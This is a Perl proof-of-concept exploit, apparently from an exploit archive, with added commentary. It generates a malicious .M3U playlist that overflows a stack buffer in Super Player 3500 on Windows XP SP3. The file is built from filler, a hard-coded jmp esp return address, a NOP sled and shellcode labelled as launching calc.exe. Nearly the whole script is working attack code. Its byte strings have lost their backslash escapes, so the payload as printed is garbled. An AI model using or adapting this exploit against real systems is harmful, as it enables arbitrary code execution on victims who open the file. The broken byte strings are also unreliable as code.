
# Title : Super Player 3500 (.m3u) - Local Stack Based Buffer Overflow
# Published : 2013-07-23
# Author :


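#!/usr/bin/perl

#SuperPlayer3500 Local stack based buffer overflow
#Author:jun
#Email:haojunhou@gmail.com
#Date:Tue Jul 22 2013
#Vendor Link:http://www.haojie.cn
#Software Link:http://www.haojie.cn/download/setup_3500.exe
#App Version:3500
#Tested on:windows xp sp3
#
# Proof-of-concept file generator. It writes a single .M3U playlist whose one
# entry is long enough to overrun a fixed-size stack buffer in the player's
# playlist parser (the "local" part: the victim has to open the file). The
# written line is, in order: filler, the value that lands on the saved return
# address, a NOP sled, then the payload. All byte strings below are kept
# verbatim from the published PoC; the only changes are strictures and
# checked, three-argument file I/O.

use strict;
use warnings;

# Output path, relative to the current working directory.
my $file = "superplay3500exp.M3U";

# Filler up to the saved return address. The 348-byte offset is specific to
# the tested build and was presumably found empirically by the author.
my $junk = "A" x 348;

# Saved return address is replaced with the address of a "jmp esp" gadget in
# user32.dll. pack('V') gives the little-endian byte order the x86 stack
# expects. Because the address is hard-coded for one platform (Windows XP
# SP3, per the header), the PoC is not portable; randomised library bases on
# later Windows versions are exactly what breaks this class of fixed-address
# PoC.
my $eip = pack('V', 0x77d29353); #jmp esp on user32.dll

# NOP sled in front of the payload. Kept byte-for-byte as it appears on this
# page, escape text included.
my $nops = "x90" x 20;

#exec calc.exe
# Payload, kept byte-for-byte as it appears on this page. The trailing "rn"
# is the line terminator the original appended after the payload, also kept
# verbatim.
my $shellcode =
"x33xc9xb8xd1xa3x3dx27xdaxdfxd9x74x24xf4xb1" .
"x32x5ax83xc2x04x31x42x0cx03x93xafxdfxd2xef" .
"x58x96x1dx0fx99xc9x94xeaxa8xdbxc3x7fx98xeb" .
"x80x2dx11x87xc5xc5xa2xe5xc1xeax03x43x34xc5" .
"x94x65xf8x89x57xe7x84xd3x8bxc7xb5x1cxdex06" .
"xf1x40x11x5axaax0fx80x4bxdfx4dx19x6dx0fxda" .
"x21x15x2ax1cxd5xafx35x4cx46xbbx7ex74xecxe3" .
"x5ex85x21xf0xa3xccx4exc3x50xcfx86x1dx98xfe" .
"xe6xf2xa7xcfxeax0bxefxf7x14x7ex1bx04xa8x79" .
"xd8x77x76x0fxfdxdfxfdxb7x25xdexd2x2exadxec" .
"x9fx25xe9xf0x1exe9x81x0cxaax0cx46x85xe8x2a" .
"x42xcexabx53xd3xaax1ax6bx03x12xc2xc9x4fxb0" .
"x17x6bx12xdexe6xf9x28xa7xe9x01x33x87x81x30" .
"xb8x48xd5xccx6bx2dx27x3cxa6xbbxb0xe7x53x86" .
"xdcx17x8exc4xd8x9bx3bxb4x1ex83x49xb1x5bx03" .
"xa1xcbxf4xe6xc5x78xf4x22xa6x1fx66xaex29"."rn";

# Three-argument open with a lexical handle. The original two-argument,
# bareword form would have parsed mode characters out of $file and silently
# continued if the open failed.
open my $fh, '>', $file or die "open $file: $!";
print {$fh} $junk . $eip . $nops . $shellcode;
# Buffered write errors only surface at close, so that result is checked too.
close $fh or die "close $file: $!";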